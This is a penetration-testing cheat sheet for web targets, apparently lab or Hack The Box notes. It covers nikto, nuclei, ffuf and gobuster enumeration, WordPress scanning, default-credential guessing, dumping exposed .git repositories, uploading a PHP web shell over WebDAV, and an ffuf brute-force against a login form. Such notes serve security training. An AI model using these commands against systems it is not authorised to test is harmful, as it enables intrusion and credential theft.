Web Scanning
- If
cgi-binis present then do further fuzzing and obtain files like .sh or .pl (Shellsock) - Test the login site
- Have a valid usernames first
- Try
admin:admin - Try
username:usernameas first credential - If it’s related to a service, try default passwords.
- Service name as the username as well as the same name for password.
Nikto
Scan web service with nikto:
nikto -h <ip>
Test different ports with one scan:
nikto -h <ip> -p 80,8080,1234
Nuclei
Scan web service with nuclei:
nuclei -u <url>
Enumeration
Directory Fuzzing
ffuf -w <wordlist> -u http://<ip>:<port>/FUZZ -ic
gobuster dir
Sub-domain Fuzzing
ffuf -w <wordlist> -u http://FUZZ.<URL>/ -ic
gobuster dns -d <URL> -w <wordlist>
VHost Fuzzing
ffuf -w <wordlist> -u http://<url>:PORT/ -H 'Host: FUZZ.<url>' -ic
gobuster vhost -u <URL> -w <wordlist> --append-domain
Wordpress scan
Updating DB of WPScan
wpscan --update
Scanning the target
wpscan --url <ip>
Scanning all plugins
wpscan --url <url> --enumerate ap --plugins-detection aggressive
Scanning with Api Tokens
wpscan --url https://brainfuck.htb --api-token <redacted>
WebDav
Davtest
Test WebDAV enabled servers
davtest --url <url>
Cadaver
Login into WebDav and put the web shell to execute
cadaver <url>/dav/
put /tmp/shell.php
Git
Download .git
mkdir <DESTINATION_FOLDER>
./gitdumper.sh <URL>/.git/ <DESTINATION_FOLDER>
git-dumper <IP>/.git ~/website
Extract .git content
mkdir <EXTRACT_FOLDER>
./extractor.sh <DESTINATION_FOLDER> <EXTRACT_FOLDER>
# Log information of the current repository.
git log
# This will display the log of the stuff happened, like commit history which is very useful
git show <commit-id>
Since you're using two wordlists (username + password), use POST fuzzing with two fuzz points:
#### FFUF header & token
ffuf -u http://10.129.16.39:8080/j_spring_security_check \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "j_username=FUZZ&j_password=FUZ2" \
-w usernames.txt:FUZZ -w passwords.txt:FUZ2 \
-fr "loginError"
✅ Explanation
-fr "loginError" → filter out results containing loginError → we only keep success responses.
Or alternatively: